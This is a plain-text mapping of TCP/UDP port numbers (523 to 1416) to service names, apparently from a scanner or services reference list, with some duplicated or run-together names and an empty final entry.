523=Unassigned
524=Unassigned
526=newdate
530=rpc courier
531=chatconference
532=readnewsnetnews
533=for emergency broadcasts
539=Apertus Technologies Load Determination
540=uucp
541=uucp-rlogin
542=Unassigned
543=klogin
544=kshell
545=Unassigned
546=Unassigned
547=Unassigned
548=Unassigned
549=Unassigned
550=new-who
551=Unassigned
552=Unassigned
553=Unassigned
554=Unassigned
555=dsf
556=remotefs
557-559=rmonitor
560=rmonitord
561=dmonitor
562=chcmd
563=Unassigned
564=plan 9 file service
565=whoami
566-569 Unassigned
570=demonmeter
571=udemonmeter
572-599 Unassigned ipc server
600=Sun IPC server
607=nqs
606=Cray Unified Resource Manager
608=Sender-Initiated/Unsolicited File Transfer
609=npmp-trapnpmp-trap
610=npmp-localnpmp-local
611=npmp-guinpmp-gui
634=ginadginad
666=Doom Id Software
704=errlog copy/server daemon
709=EntrustManager
729=IBM NetView DM/6000 Server/Client
730=IBM NetView DM/6000 send/tcp
731=IBM NetView DM/6000 receive/tcp
741=netGWnetgw
742=Network based Rev. Cont. Sys.
744=Flexible License Manager
747=Fujitsu Device Control
748=Russell Info Sci Calendar Manager
749=kerberos administration
751=pump
752=qrh
754=send
758=nlogin
759=con
760=ns
762=quotad
763=cycleserv
765=webster
767=phonephonebook
769=vid
771=rtip
772=cycleserv2
774=acmaint_dbd
775=acmaint_transd
780=wpgs
786=Concertconcert
800=mdbs_daemon
996=Central Point Software
997=maitrd
999=puprouter
1023=Reserved
1024=Reserved
1025=network blackjack
1030=BBN IAD
1031=BBN IAD
1032=BBN IAD
1067=Installation Bootstrap Proto. Serv.
1068=Installation Bootstrap Proto. Cli.
1080=SOCKS
1083=Anasoft License Manager
1084=Anasoft License Manager
1155=Network File Access
1222=SNI R&D network
1248=hermes
1346=Alta Analytics License Manager
1347=multi media conferencing
1347=multi media conferencing
1348=multi media conferencing
1349=Registration Network Protocol
1350=Registration Network Protocol
1351=Digital Tool Works (MIT)
1352=/Lotus Notelotusnote
1353=Relief Consulting
1354=RightBrain Software
1355=Intuitive Edge
1356=CuillaMartin Company
1357=Electronic PegBoard
1358=CONNLCLIconnlcli
1359=FTSRVftsrv
1360=MIMERmimer
1361=LinX
1362=TimeFliestimeflies
1363=Network DataMover Requester
1364=Network DataMover Server
1365=Network Software Associates
1366=Novell NetWare Comm Service Platform
1367=DCSdcs
1368=ScreenCastscreencast
1369=GlobalView to Unix Shell
1370=Unix Shell to GlobalView
1371=Fujitsu Config Protocol
1372=Fujitsu Config Protocol
1373=Chromagrafxchromagrafx
1374=EPI Software Systems
1375=Bytexbytex
1376=IBM Person to Person Software
1377=Cichlid License Manager
1378=Elan License Manager
1379=Integrity Solutions
1380=Telesis Network License Manager
1381=Apple Network License Manager
1382=udt_os
1383=GW Hannaway Network License Manager
1384=Objective Solutions License Manager
1385=Atex Publishing License Manager
1386=CheckSum License Manager
1387=Computer Aided Design Software Inc LM
1388=Objective Solutions DataBase Cache
1389=Document Manager
1390=Storage Controller
1391=Storage Access Server
1392=Print Managericlpv-pm
1393=Network Log Server
1394=Network Log Client
1395=PC Workstation Manager software
1396=DVL Active Mail
1397=Audio Active Mail
1398=Video Active Mail
1399=Cadkey License Manager
1400=Cadkey Tablet Daemon
1401=Goldleaf License Manager
1402=Prospero Resource Manager
1403=Prospero Resource Manager
1404=Infinite Graphics License Manager
1405=IBM Remote Execution Starter
1406=NetLabs License Manager
1407=DBSA License Manager
1408=Sophia License Manager
1409=Here License Manager
1410=HiQ License Manager
1411=AudioFileaf
1412=InnoSysinnosys
1413=Innosys-ACLinnosys-acl
1414=IBM MQSeriesibm-mqseries
1415=DBStardbstar
1416=